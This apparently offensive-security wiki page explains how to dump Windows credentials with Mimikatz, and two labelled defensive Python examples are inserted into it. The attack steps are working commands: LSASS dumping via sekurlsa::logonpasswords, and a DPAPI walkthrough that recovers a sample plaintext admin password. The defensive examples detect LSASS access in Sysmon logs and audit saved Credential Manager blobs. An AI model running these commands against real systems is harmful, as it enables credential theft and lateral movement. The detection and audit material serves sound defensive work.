
Mimikatz


Last updated 7 years ago

The now very famous tool mimikatz can, among other things, be used to dump credentials, that is, hashes and/or . The latest release of mimikatz can be found as a precompiled binary for Windows on gentilkiwi's .

Important note about privilege: running Mimikatz nearly always requires administrative privileges, preferably NT SYSTEM, to run correctly. The privilege module is able to elevate a user from Administrator to SYSTEM.

mimikatz # privilege::debug
Privilege '20' OK

Dumping creds from lsass

mimikatz # sekurlsa::logonpasswords
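From the defender's side, `sekurlsa::logonpasswords` has to open a handle to lsass.exe with memory-read access, which Sysmon records as Event ID 10 (ProcessAccess). The following is an added example, not code from this page or from the mimikatz project: a small detection rule run over constructed sample events in the "Key: Value" layout Event Viewer shows. The allowlist of legitimate LSASS readers and the sample events (paths, timestamps, call traces) are constructed for the example and should be replaced with your own baseline.

```python
import re
from dataclasses import dataclass

# Win32 process access rights (winnt.h) relevant to reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed allowlist (hypothetical, lower-cased full paths) of images that
# legitimately open lsass.exe with read access on a typical host. Build your
# own from baseline telemetry; an allowlist that is too wide hides the attack.
ALLOWED_LSASS_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample of three Sysmon Event ID 10 (ProcessAccess) messages in
# the "Key: Value" layout Event Viewer shows; events are separated by a blank line.
SAMPLE_EVENTS = r"""Process accessed:
UtcTime: 2024-05-01 10:12:03.117
SourceImage: C:\Program Files\Windows Defender\MsMpEng.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d6c4|C:\Program Files\Windows Defender\MpClient.dll+1a2b3

Process accessed:
UtcTime: 2024-05-01 10:13:44.902
SourceImage: C:\Users\jdoe\Desktop\mimikatz.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d6c4|C:\Users\jdoe\Desktop\mimikatz.exe+6e1d2

Process accessed:
UtcTime: 2024-05-01 10:14:01.005
SourceImage: C:\Windows\System32\Taskmgr.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1400
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d6c4|C:\Windows\System32\Taskmgr.exe+1f0a
"""


@dataclass
class Alert:
    utc_time: str
    source_image: str
    granted_access: int
    reason: str


def parse_events(text):
    """Split a dump of event messages into one dict of fields per event."""
    events = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in chunk.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        events.append(fields)
    return events


def classify_lsass_access(event):
    """Return an Alert if this ProcessAccess event looks like credential
    theft from LSASS, else None."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return None  # not about lsass at all
    source = event.get("SourceImage", "")
    if source.lower() in ALLOWED_LSASS_READERS:
        return None  # known-good reader (AV, core OS processes)
    access = int(event.get("GrantedAccess", "0"), 16)
    reason = None
    if access == PROCESS_ALL_ACCESS:
        reason = "PROCESS_ALL_ACCESS handle to lsass"
    elif access & (PROCESS_VM_READ | PROCESS_VM_WRITE):
        # sekurlsa::logonpasswords needs to read LSASS memory; 0x1010 is
        # PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ.
        reason = "memory read/write access to lsass (0x%x)" % access
    if reason is None:
        return None  # e.g. 0x1400: query-only handles such as Task Manager's
    return Alert(event.get("UtcTime", ""), source, access, reason)


def detect(text):
    """Run the rule over a text dump of Sysmon events; returns the alerts."""
    alerts = [classify_lsass_access(e) for e in parse_events(text)]
    return [a for a in alerts if a is not None]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert.utc_time} ALERT {alert.source_image}: {alert.reason}")
```

Only the second sample event fires: Defender is allowlisted and the Task Manager handle carries no VM_READ bit. The access mask is the durable signal here, since the source image name is trivially renamed; on top of detection, LSA Protection (RunAsPPL) and Credential Guard are the controls that stop the handle from being useful in the first place.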

DPAPI method

In certain scenarios like RDP jumpstations a user might find it useful to save RDP credentials locally in Windows to prevent having to retype passwords. A common scenario is a regular user with a separate admin privileged account that is used for RDP-ing into other boxes. The passwords are then stored in the Windows credential manager.

Credentials for the manager are usually stored in files in either of the following two directories. Use dir /a to check their contents.

C:\Users\username\AppData\Roaming\Microsoft\Credentials
C:\Users\username\AppData\Local\Microsoft\Credentials

If both are empty, then credentials are probably not saved in the credential manager. The files are usually named with 32 character, all caps alphanumerical strings, so something like: 0DCF46D87F2DCE439DC47AA5F9267462.
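The same two directories are what an administrator should audit on RDP jump hosts, because a privileged account that saved its password there is exactly the scenario this page exploits. The following is an added example, not code from this page or the mimikatz project: it walks every profile under a users root, reports which profiles hold credential blobs (files whose name is 32 upper-case hex characters, as described above) and ignores everything else in those folders. The demo tree, profile names and the fake blob contents are constructed for the example; `demo()` is a hypothetical helper that builds that tree in a temporary directory so the script runs offline.

```python
import re
import tempfile
from pathlib import Path

# The two per-profile directories (from the page) in which Credential Manager
# keeps its DPAPI-protected blobs; both are hidden, hence "dir /a".
CREDENTIAL_DIRS = (
    Path("AppData") / "Roaming" / "Microsoft" / "Credentials",
    Path("AppData") / "Local" / "Microsoft" / "Credentials",
)

# Blob files are named with 32 upper-case hex characters, e.g.
# 0DCF46D87F2DCE439DC47AA5F9267462 (the example file name from the page).
BLOB_NAME = re.compile(r"^[0-9A-F]{32}$")


def is_credential_blob(name):
    return BLOB_NAME.match(name) is not None


def scan_profiles(users_root):
    """Map profile name -> list of credential blob paths, for every profile
    under users_root (e.g. C:\\Users) that has at least one saved credential."""
    findings = {}
    for profile in sorted(p for p in Path(users_root).iterdir() if p.is_dir()):
        blobs = []
        for rel in CREDENTIAL_DIRS:
            folder = profile / rel
            if not folder.is_dir():
                continue  # directory missing (or, on a real host, not readable)
            blobs += [f for f in folder.iterdir()
                      if f.is_file() and is_credential_blob(f.name)]
        if blobs:
            findings[profile.name] = sorted(str(b) for b in blobs)
    return findings


def build_demo_tree(root):
    """Constructed fixture: 'alice' saved one credential, 'bob' saved none."""
    root = Path(root)
    alice = root / "alice" / CREDENTIAL_DIRS[1]
    alice.mkdir(parents=True)
    (alice / "0DCF46D87F2DCE439DC47AA5F9267462").write_bytes(b"\x01\x00\x00\x00")  # fake blob
    (alice / "desktop.ini").write_text("[.ShellClassInfo]")  # not a blob, must be ignored
    (root / "bob" / CREDENTIAL_DIRS[0]).mkdir(parents=True)
    return root


def demo():
    """Scan a throw-away demo tree and return {profile: number of blobs}."""
    with tempfile.TemporaryDirectory() as tmp:
        return {user: len(blobs)
                for user, blobs in scan_profiles(build_demo_tree(tmp)).items()}


if __name__ == "__main__":
    # Against a real host run, as an administrator: scan_profiles(r"C:\Users")
    for user, count in demo().items():
        print(f"{user}: {count} saved credential blob(s)")
```

Reading other users' profiles needs local administrator rights, so run it from a management context rather than as the logged-on user. Where the audit turns up saved credentials for admin accounts on shared jump hosts, the corrective control is the security option "Network access: Do not allow storage of passwords and credentials for network authentication", which prevents Credential Manager from saving them at all.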

Once you have the file name and path for the credential file, open up mimikatz and run:

mimikatz # dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462

This will dump the credential blob which contains what we want to decrypt and the GUID for the masterkey which is required for decryption.

As SYSTEM, we can dump all masterkeys; the ! is very important here.

mimikatz # !sekurlsa::dpapi

You should get a 129 character string as the masterkey associated with the GUID you found in the previous step.

GUID: {6515c6ef-60cd-4563-a3d5-3d70a6bc699}
masterkey: 76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04

Proceed by using the masterkey to decrypt the credentials.

mimikatz # dpapi::cred /in:C:\Users\username\AppData\Local\Microsoft\Credentials\0DCF46D87F2DCE439DC47AA5F9267462 /masterkey:76081ac6e809573b4dfa1a7a8eac3ae0106aa3f4d283fc3d6cf114a6285b582d4df53dc0e30b64c318e473bce49adabb73ad8cccd8bf4d7d10f44f4d4e48cf04

The username and plaintext password should be printed.

UserName       : LAN\username_adm
CredentialBlob : Sup3rAw3s0m3Passw0rd!

Use vault::list to figure out which boxes the credentials belong to. Often they are tied to specific servers.

Useful links

Github page
https://github.com/gentilkiwi/mimikatz/wiki/module-~-privilege
https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/